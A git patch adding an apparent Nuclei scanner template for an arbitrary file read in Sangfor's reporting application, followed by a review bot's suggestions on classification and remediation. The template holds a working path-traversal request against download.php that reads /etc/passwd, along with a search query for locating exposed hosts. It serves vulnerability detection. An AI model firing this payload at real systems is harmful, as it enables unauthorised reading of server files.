From 587197f9b5d3379f5a30079d7e6620c08ad5fde6 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sat, 5 Aug 2023 11:39:16 +0530
Subject: [PATCH] Create sangfor-download-lfi.yaml
---
.../other/sangfor-download-lfi.yaml | 38 +++++++++++++++++++
1 file changed, 38 insertions(+)
create mode 100644 http/vulnerabilities/other/sangfor-download-lfi.yaml
diff --git a/http/vulnerabilities/other/sangfor-download-lfi.yaml b/http/vulnerabilities/other/sangfor-download-lfi.yaml
new file mode 100644
index 0000000000..cd7109ea4a
--- /dev/null
+++ b/http/vulnerabilities/other/sangfor-download-lfi.yaml
@@ -0,0 +1,38 @@
+id: sangfor-download-lfi
+
+info:
+ name: Sangfor Application download.php - Arbitary File Read
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ There is an arbitrary file reading vulnerability in the Sangfor Application download.php.
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md?plain=1
+ metadata:
+ max-request: 1
+ fofa-query: app="SANGFOR-应用交付报表系统"
+ verified: true
+ tags: lfi,sangfor
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/report/download.php?pdf=../../../../../etc/passwd'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+
+ - type: word
+ part: header
+ words:
+ - application/force-download
+ - 'filename="passwd"'
+ condition: and
+
+ - type: status
+ status:
+ - 200
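Review bot: The `info` block has no `classification` or `remediation`, so a match is reported as `severity: high` with nothing that ties it to a weakness class or tells the asset owner what to do next. The request path shows a `../` traversal through the `pdf` parameter, so a `classification:` entry with `cwe-id: CWE-22` fits, and a line such as `remediation: Restrict access to the /report/ interface to trusted management networks and apply the vendor's fixed release.` would make the finding actionable; this page names no fixed version, so none is given here. The `name` also misspells its title and should read `name: Sangfor Application download.php - Arbitrary File Read`.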